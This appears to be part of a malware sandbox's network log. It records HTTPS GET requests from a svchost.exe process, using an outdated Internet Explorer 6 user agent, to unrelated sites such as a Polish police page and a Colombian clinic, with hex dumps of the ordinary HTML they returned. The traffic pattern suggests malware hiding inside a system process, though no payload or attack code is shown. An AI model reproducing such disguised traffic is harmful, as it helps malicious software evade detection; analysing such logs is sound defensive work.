                                                                                                                                                                                                                                                  2023-07-27 19:54:02 UTC1705INData Raw: 69 70 74 27 20 73 72 63 3d 27 68 74 74 70 73 3a 2f 2f 64 61 74 61 66 6f 72 6d 2e 63 6f 2e 75 6b 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 70 6c 75 67 69 6e 73 2f 72 65 76 73 6c 69 64 65 72 2f 70 75 62 6c 69 63 2f 61 73 73 65 74 73 2f 6a 73 2f 6a 71 75 65 72 79 2e 74 68 65 6d 65 70 75 6e 63 68 2e 72 65 76 6f 6c 75 74 69 6f 6e 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 35 2e 34 2e 38 27 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 27 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 27 3e 2f 2f 3c 21 5b 43 44 41 54 41 5b 0a 76 61 72 20 77 63 5f 61 64 64 5f 74 6f 5f 63 61 72 74 5f 70 61 72 61 6d 73 3d 7b 22 61 6a 61 78 5f 75 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 64 61 74 61 66 6f 72 6d 2e 63 6f 2e 75 6b 5c 2f 77 70 2d 61 64 6d 69 6e 5c 2f 61
                                                                                                                                                                                                                                                  Data Ascii: ipt' src='https://dataform.co.uk/wp-content/plugins/revslider/public/assets/js/jquery.themepunch.revolution.min.js?ver=5.4.8'></script><script type='text/javascript'>//<![CDATA[var wc_add_to_cart_params={"ajax_url":"https:\/\/dataform.co.uk\/wp-admin\/a
                                                                                                                                                                                                                                                  2023-07-27 19:54:02 UTC1713INData Raw: 70 73 3a 2f 2f 64 61 74 61 66 6f 72 6d 2e 63 6f 2e 75 6b 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 75 70 6c 6f 61 64 73 2f 32 30 32 33 2f 30 31 2f 44 46 2d 69 63 6f 6e 2d 6c 6f 67 6f 2e 73 76 67 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 22 20 73 69 7a 65 73 3d 22 37 36 78 37 36 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 64 61 74 61 66 6f 72 6d 2e 63 6f 2e 75 6b 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 75 70 6c 6f 61 64 73 2f 32 30 32 33 2f 30 31 2f 44 46 2d 69 63 6f 6e 2d 6c 6f 67 6f 2e 73 76 67 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 22 20 73 69 7a 65 73 3d 22 31 32 30 78 31 32 30 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 64 61 74 61 66 6f 72 6d 2e 63 6f 2e 75 6b
                                                                                                                                                                                                                                                  Data Ascii: ps://dataform.co.uk/wp-content/uploads/2023/01/DF-icon-logo.svg"><link rel="apple-touch-icon" sizes="76x76" href="https://dataform.co.uk/wp-content/uploads/2023/01/DF-icon-logo.svg"><link rel="apple-touch-icon" sizes="120x120" href="https://dataform.co.uk
                                                                                                                                                                                                                                                  2023-07-27 19:54:02 UTC1721INData Raw: 6d 65 6e 75 2d 69 74 65 6d 2d 6f 62 6a 65 63 74 2d 70 61 67 65 20 6d 65 6e 75 2d 69 74 65 6d 2d 35 34 30 34 30 22 3e 3c 61 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 64 61 74 61 66 6f 72 6d 2e 63 6f 2e 75 6b 2f 70 72 69 63 69 6e 67 2f 27 20 64 61 74 61 2d 6c 65 76 65 6c 3d 27 31 27 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 6d 65 6e 75 2d 69 74 65 6d 2d 74 65 78 74 22 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 6d 65 6e 75 2d 74 65 78 74 22 3e 50 72 69 63 69 6e 67 3c 2f 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 2f 6c 69 3e 20 3c 6c 69 20 63 6c 61 73 73 3d 22 6d 65 6e 75 2d 69 74 65 6d 20 6d 65 6e 75 2d 69 74 65 6d 2d 74 79 70 65 2d 70 6f 73 74 5f 74 79 70 65 20 6d 65 6e 75 2d 69 74 65 6d 2d 6f 62 6a 65 63 74 2d 70 61 67 65 20 6d 65 6e 75 2d 69 74
                                                                                                                                                                                                                                                  Data Ascii: menu-item-object-page menu-item-54040"><a href='https://dataform.co.uk/pricing/' data-level='1'><span class="menu-item-text"><span class="menu-text">Pricing</span></span></a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-it
                                                                                                                                                                                                                                                  2023-07-27 19:54:02 UTC1729INData Raw: 68 74 74 70 73 3a 2f 2f 64 61 74 61 66 6f 72 6d 2e 63 6f 2e 75 6b 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 74 68 65 6d 65 73 2f 64 74 2d 74 68 65 37 2f 6a 73 2f 6d 61 69 6e 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 36 2e 30 2e 31 27 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 27 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 27 3e 2f 2f 3c 21 5b 43 44 41 54 41 5b 0a 76 61 72 20 77 70 63 66 37 3d 7b 22 61 70 69 53 65 74 74 69 6e 67 73 22 3a 7b 22 72 6f 6f 74 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 64 61 74 61 66 6f 72 6d 2e 63 6f 2e 75 6b 5c 2f 77 70 2d 6a 73 6f 6e 5c 2f 63 6f 6e 74 61 63 74 2d 66 6f 72 6d 2d 37 5c 2f 76 31 22 2c 22 6e 61 6d 65 73 70 61 63 65 22 3a 22 63 6f 6e 74 61 63 74 2d 66 6f 72 6d 2d 37 5c 2f 76 31 22 7d 7d 3b 0a
                                                                                                                                                                                                                                                  Data Ascii: https://dataform.co.uk/wp-content/themes/dt-the7/js/main.min.js?ver=6.6.0.1'></script><script type='text/javascript'>//<![CDATA[var wpcf7={"apiSettings":{"root":"https:\/\/dataform.co.uk\/wp-json\/contact-form-7\/v1","namespace":"contact-form-7\/v1"}};


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                  24192.168.2.45940291.229.22.126443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                  2023-07-27 19:54:01 UTC1552OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                  Accept: *
                                                                                                                                                                                                                                                  Accept-Language: en-us
                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                  Host: pleszew.policja.gov.pl
                                                                                                                                                                                                                                                  2023-07-27 19:54:01 UTC1553INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                  Date: Thu, 27 Jul 2023 19:55:52 GMT
                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                                                                                                  2023-07-27 19:54:01 UTC1553INData Raw: 31 66 63 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 70 6c 22 3e 0d 0a 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 2f 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 20 22 2f 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 22 2f 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 49 6e 64 65 78 2c 20 46 6f 6c 6c 6f 77 22 2f 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 75 74 68 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 4b 50 50 20 50 6c 65
                                                                                                                                                                                                                                                  Data Ascii: 1fc0<!DOCTYPE html><html lang="pl"> <head> <meta charset="UTF-8"/> <meta name="description" content=" "/> <meta name="keywords" content=""/> <meta name="robots" content="Index, Follow"/> <meta name="author" content="KPP Ple
                                                                                                                                                                                                                                                  2023-07-27 19:54:01 UTC1613INData Raw: 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 3c 2f 61 72 74 69 63 6c 65 3e 0d 0a 20 20 20 20 20 0d 0a 20 20 20 20 3c 2f 73 65 63 74 69 6f 6e 3e 0d 0a 20 20 20 20 0d 0a 20 20 3c 2f 73 65 63 74 69 6f 6e 3e 0d 0a 3c 2f 64 69 76 3e 0d 0a 3c 21 2d 2d 20 20 74 6f 70 6e 65 77 73 2e 20 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 20 63 6f 6e 74 0d 0a 32 30 30 30 0d 0a 65 6e 74 20 20 2d 2d 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 63 6f 6e 74 65 6e 74 22 3e 0d 0a 20 20 0d 0a 20 20 3c 21 2d 2d 20 20 63 6f 6e 74 65 6e 74 2d 6c 65 66 74 20 20 2d 2d 3e 0d 0a 20 20 3c 61 72 74 69 63 6c 65 20 69 64 3d 22 77 74 78 74 22 20 63 6c 61 73 73 3d 22 6d 61 69 6e 4c 65 66 74 22 3e 0d 0a 20 20 20 20 0d 0a 20 20 20 20 3c 21 2d 2d 20
                                                                                                                                                                                                                                                  Data Ascii: </div> </div> </article> </section> </section></div>... topnews. -->... cont2000ent --><div id="content"> ... content-left --> <article id="wtxt" class="mainLeft"> ...
                                                                                                                                                                                                                                                  2023-07-27 19:54:01 UTC1629INData Raw: 20 61 72 69 61 2d 68 69 64 64 65 6e 3d 22 74 72 75 65 22 20 2f 3e 3c 2f 61 3e 3c 2f 64 69 76 3e 0a 09 09 0a 09 0a 09 09 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 69 74 65 6d 22 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 33 30 30 70 78 3b 20 68 65 69 67 68 74 3a 38 35 70 78 3b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 31 30 70 78 22 3e 3c 61 20 68 72 65 66 3d 22 2f 77 32 30 2f 62 61 74 6f 6e 79 2f 33 39 36 31 2c 64 6f 70 61 6c 61 63 0d 0a 31 30 30 30 0d 0a 7a 65 2e 68 74 6d 6c 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 20 61 72 69 61 2d 6c 61 62 65 6c 3d 22 64 6f 70 61 6c 61 63 7a 65 22 3e 3c 69 6d 67 20 73 72 63 3d 22 2f 64 6f 6b 75 6d 65 6e 74 79 2f 62 61 74 6f 6e 79 2f 33 39 36 31 2e 6a 70 67 3f 76 3d 31 36 35 37 31 31 32 36 31 38 22 20 61
                                                                                                                                                                                                                                                  Data Ascii: aria-hidden="true" /></a></div><div class="item" style="width:300px; height:85px;margin-bottom:10px"><a href="/w20/batony/3961,dopalac1000ze.html" target="_blank" aria-label="dopalacze"><img src="/dokumenty/batony/3961.jpg?v=1657112618" a
                                                                                                                                                                                                                                                  2023-07-27 19:54:01 UTC1649INData Raw: 63 6a 61 50 4c 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 20 74 69 74 6c 65 3d 22 4f 64 77 69 65 64 c5 ba 20 6e 61 73 20 6e 61 20 59 6f 75 54 75 62 65 22 20 63 6c 61 73 73 3d 22 79 74 22 3e 4f 64 77 69 65 64 c5 ba 20 6e 61 73 20 6e 61 20 59 6f 75 54 75 62 65 3c 2f 61 3e 3c 2f 6c 69 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 2f 57 69 65 6c 6b 6f 70 6f 6c 73 6b 61 2d 50 6f 0d 0a 37 34 32 0d 0a 6c 69 63 6a 61 2d 34 39 30 31 39 36 36 30 34 34 37 30 33 34 32 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 20 74 69 74 6c 65 3d 22 4f 64 77 69 65 64 c5 ba 20 6e 61 73 20 6e 61 20 46 61 63 65 62 6f 6f 6b 22 20 63 6c 61 73
                                                                                                                                                                                                                                                  Data Ascii: cjaPL" target="_blank" title="Odwied nas na YouTube" class="yt">Odwied nas na YouTube</a></li> <li><a href="https://www.facebook.com/Wielkopolska-Po742licja-490196604470342/" target="_blank" title="Odwied nas na Facebook" clas


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                  25192.168.2.459546104.21.66.220443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                  2023-07-27 19:54:02 UTC1651OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                  Accept: *
                                                                                                                                                                                                                                                  Accept-Language: en-us
                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                  Host: clinicasanluis.com.co
                                                                                                                                                                                                                                                  2023-07-27 19:54:02 UTC1651INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Date: Thu, 27 Jul 2023 19:54:02 GMT
                                                                                                                                                                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  Expires: Wed, 17 Aug 2005 00:00:00 GMT
                                                                                                                                                                                                                                                  Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                                                                                                  Set-Cookie: d55e479f054c94814cbc10d217aaa990=0cf3af82f41011f8c71609af3ff367e1; path=/; HttpOnly
                                                                                                                                                                                                                                                  Last-Modified: Thu, 27 Jul 2023 19:54:02 GMT
                                                                                                                                                                                                                                                  CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=dulWtsp0Z1grGetDFV8G2tUjGTeh2vHfYzGG9lqiOL0BvK0XNrDu4jZucQm56m7HnpkfMHkgczhhthlMOd%2FJKWlygpIKH6ZOfi3vwStY1DW276C4FmoPEjW1CRaBIf3HKJmfgFcP6no%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                                                                                                  CF-RAY: 7ed76e93f9da8fec-FRA
                                                                                                                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                  2023-07-27 19:54:02 UTC1652INData Raw: 37 63 35 34 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 73 2d 45 53 22 20 64 69 72 3d 22 6c 74 72 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 20 2f 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 3c 62 61 73 65 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 6c 69 6e 69 63 61 73 61 6e 6c 75 69 73 2e 63 6f 6d 2e 63 6f 2f 22 20
                                                                                                                                                                                                                                                  Data Ascii: 7c54<!DOCTYPE html><html lang="es-ES" dir="ltr"><head><meta name="viewport" content="width=device-width, initial-scale=1.0"><meta http-equiv="X-UA-Compatible" content="IE=edge" /><meta charset="utf-8" /><base href="https://clinicasanluis.com.co/"
                                                                                                                                                                                                                                                  2023-07-27 19:54:02 UTC1653INData Raw: 61 73 73 65 74 73 2f 73 74 79 6c 65 73 2f 72 6f 6b 62 6f 78 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 6d 6f 64 75 6c 65 73 2f 6d 6f 64 5f 70 6f 70 75 70 61 68 6f 6c 69 63 2f 63 73 73 2f 6a 71 75 65 72 79 2e 67 61 66 61 6e 63 79 62 6f 78 2e 6d 69 6e 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 6d 65 64 69 61 2f 67 61 6e 74 72 79 35 2f 61 73 73 65 74 73 2f 63 73 73 2f 66 6f 6e 74 2d 61 77 65 73 6f 6d 65 2e 6d 69 6e 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 6d 65 64 69 61 2f 67 61 6e 74 72 79 35 2f 65 6e 67 69 6e 65 73 2f 6e 75 63 6c 65 75
                                                                                                                                                                                                                                                  Data Ascii: assets/styles/rokbox.css" rel="stylesheet" /><link href="/modules/mod_popupaholic/css/jquery.gafancybox.min.css" rel="stylesheet" /><link href="/media/gantry5/assets/css/font-awesome.min.css" rel="stylesheet" /><link href="/media/gantry5/engines/nucleu
                                                                                                                                                                                                                                                  2023-07-27 19:54:02 UTC1654INData Raw: 36 34 36 61 31 61 30 64 66 66 66 39 61 35 36 38 35 66 62 36 65 65 33 36 64 61 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 6d 65 64 69 61 2f 73 79 73 74 65 6d 2f 6a 73 2f 6d 6f 6f 74 6f 6f 6c 73 2d 63 6f 72 65 2e 6a 73 3f 39 38 39 64 61 34 36 34 36 61 31 61 30 64 66 66 66 39 61 35 36 38 35 66 62 36 65 65 33 36 64 61 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 6d 65 64 69 61 2f 73 79 73 74 65 6d 2f 6a 73 2f 6d 6f 6f 74 6f 6f 6c 73 2d 6d 6f 72 65 2e 6a 73 3f 39 38 39 64 61 34 36 34 36 61 31 61 30 64 66 66 66 39 61 35 36 38 35 66 62 36 65 65 33 36 64 61 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 70 6c 75 67 69 6e 73 2f 73 79 73 74 65 6d 2f 72 6f 6b 62 6f 78
                                                                                                                                                                                                                                                  Data Ascii: 646a1a0dfff9a5685fb6ee36da"></script><script src="/media/system/js/mootools-core.js?989da4646a1a0dfff9a5685fb6ee36da"></script><script src="/media/system/js/mootools-more.js?989da4646a1a0dfff9a5685fb6ee36da"></script><script src="/plugins/system/rokbox
                                                                                                                                                                                                                                                  2023-07-27 19:54:02 UTC1655INData Raw: 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 6d 65 64 69 61 2f 67 61 6e 74 72 79 35 2f 65 6e 67 69 6e 65 73 2f 6e 75 63 6c 65 75 73 2f 63 73 73 2f 6e 75 63 6c 65 75 73 2d 69 65 39 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 2f 3e 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 2f 6d 65 64 69 61 2f 67 61 6e 74 72 79 35 2f 61 73 73 65 74 73 2f 6a 73 2f 6d 61 74 63 68 6d 65 64 69 61 2e 70 6f 6c 79 66 69 6c 6c 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 20 20 20 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73
                                                                                                                                                                                                                                                  Data Ascii: "></script> <link rel="stylesheet" href="/media/gantry5/engines/nucleus/css/nucleus-ie9.css" type="text/css"/> <script type="text/javascript" src="/media/gantry5/assets/js/matchmedia.polyfill.js"></script> <![endif]--><link rel="s
                                                                                                                                                                                                                                                  2023-07-27 19:54:02 UTC1657INData Raw: 20 61 6c 74 3d 22 43 6c 69 6e 69 63 61 20 53 61 6e 20 4c 75 69 73 22 20 2f 3e 0a 3c 2f 61 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 62 6c 6f 63 6b 20 73 69 7a 65 2d 36 33 22 3e 0a 3c 64 69 76 20 69 64 3d 22 6d 65 6e 75 2d 38 36 30 35 2d 70 61 72 74 69 63 6c 65 22 20 63 6c 61 73 73 3d 22 67 2d 63 6f 6e 74 65 6e 74 20 67 2d 70 61 72 74 69 63 6c 65 22 3e 20 3c 6e 61 76 20 63 6c 61 73 73 3d 22 67 2d 6d 61 69 6e 2d 6e 61 76 22 20 72 6f 6c 65 3d 22 6e 61 76 69 67 61 74 69 6f 6e 22 20 64 61 74 61 2d 67 2d 68 6f 76 65 72 2d 65 78 70 61 6e 64 3d 22 74 72 75 65 22 3e 0a 3c 75 6c 20 63 6c 61 73 73 3d 22 67 2d 74 6f 70 6c 65 76 65 6c 22 3e 0a 3c 6c 69 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 20 67 2d 6d
                                                                                                                                                                                                                                                  Data Ascii: alt="Clinica San Luis" /></a></div></div><div class="g-block size-63"><div id="menu-8605-particle" class="g-content g-particle"> <nav class="g-main-nav" role="navigation" data-g-hover-expand="true"><ul class="g-toplevel"><li class="g-menu-item g-m
                                                                                                                                                                                                                                                  2023-07-27 19:54:02 UTC1658INData Raw: 61 2d 67 2d 6d 65 6e 75 70 61 72 65 6e 74 3d 22 22 3e 3c 73 70 61 6e 3e 42 61 63 6b 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 0a 3c 2f 6c 69 3e 0a 3c 6c 69 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 79 70 65 2d 63 6f 6d 70 6f 6e 65 6e 74 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 32 31 35 20 20 22 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 61 69 6e 65 72 22 20 68 72 65 66 3d 22 2f 69 6e 64 65 78 2e 70 68 70 2f 73 6f 6d 6f 73 2d 65 73 70 65 63 69 61 6c 69 73 74 61 73 2f 65 71 75 69 70 6f 2d 6d 65 64 69 63 6f 2f 70 65 64 69 61 74 72 61 73 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 65 6e 74 22 3e 0a 3c 73 70 61 6e 20 63 6c
                                                                                                                                                                                                                                                  Data Ascii: a-g-menuparent=""><span>Back</span></a></li><li class="g-menu-item g-menu-item-type-component g-menu-item-215 "><a class="g-menu-item-container" href="/index.php/somos-especialistas/equipo-medico/pediatras"><span class="g-menu-item-content"><span cl
                                                                                                                                                                                                                                                  2023-07-27 19:54:02 UTC1659INData Raw: 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 69 74 6c 65 22 3e 45 73 70 65 63 69 61 6c 69 64 61 64 65 73 3c 2f 73 70 61 6e 3e 0a 3c 2f 73 70 61 6e 3e 0a 3c 2f 61 3e 0a 3c 2f 6c 69 3e 0a 3c 2f 75 6c 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 6c 69 3e 0a 3c 2f 75 6c 3e 0a 3c 2f 6c 69 3e 0a 3c 6c 69 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 79 70 65 2d 73 65 70 61 72 61 74 6f 72 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 31 31 30 20 67 2d 70 61 72 65 6e 74 20 67 2d 73 74 61 6e 64 61 72 64 20 20 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 61 69 6e 65 72 22 20 64 61 74 61 2d 67 2d 6d 65 6e 75 70 61 72 65 6e 74 3d 22 22 3e 20 3c 73 70
                                                                                                                                                                                                                                                  Data Ascii: class="g-menu-item-title">Especialidades</span></span></a></li></ul></div></div></li></ul></li><li class="g-menu-item g-menu-item-type-separator g-menu-item-110 g-parent g-standard "><div class="g-menu-item-container" data-g-menuparent=""> <sp
                                                                                                                                                                                                                                                  2023-07-27 19:54:02 UTC1661INData Raw: 6e 73 74 69 74 75 63 69 6f 6e 61 6c 65 73 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 65 6e 74 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 69 74 6c 65 22 3e 50 6f 6c c3 ad 74 69 63 61 73 20 69 6e 73 74 69 74 75 63 69 6f 6e 61 6c 65 73 3c 2f 73 70 61 6e 3e 0a 3c 2f 73 70 61 6e 3e 0a 3c 2f 61 3e 0a 3c 2f 6c 69 3e 0a 3c 6c 69 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 79 70 65 2d 63 6f 6d 70 6f 6e 65 6e 74 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 31 31 35 20 20 22 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 61 69 6e 65 72 22 20 68 72 65 66 3d 22 2f 69 6e 64 65 78 2e 70 68
                                                                                                                                                                                                                                                  Data Ascii: nstitucionales"><span class="g-menu-item-content"><span class="g-menu-item-title">Polticas institucionales</span></span></a></li><li class="g-menu-item g-menu-item-type-component g-menu-item-115 "><a class="g-menu-item-container" href="/index.ph
                                                                                                                                                                                                                                                  2023-07-27 19:54:02 UTC1662INData Raw: 6e 64 65 78 2e 70 68 70 2f 6e 75 65 73 74 72 61 2d 63 6c 69 6e 69 63 61 2f 6e 75 65 73 74 72 6f 73 2d 70 61 63 69 65 6e 74 65 73 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 65 6e 74 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 69 74 6c 65 22 3e 50 61 63 69 65 6e 74 65 73 3c 2f 73 70 61 6e 3e 0a 3c 2f 73 70 61 6e 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 70 61 72 65 6e 74 2d 69 6e 64 69 63 61 74 6f 72 22 20 64 61 74 61 2d 67 2d 6d 65 6e 75 70 61 72 65 6e 74 3d 22 22 3e 3c 2f 73 70 61 6e 3e 20 3c 2f 61 3e 0a 3c 75 6c 20 63 6c 61 73 73 3d 22 67 2d 64 72 6f 70 64 6f 77 6e 20 67 2d 69 6e 61 63 74 69 76 65 20 67 2d 66 61 64 65 20 67 2d 64 72 6f
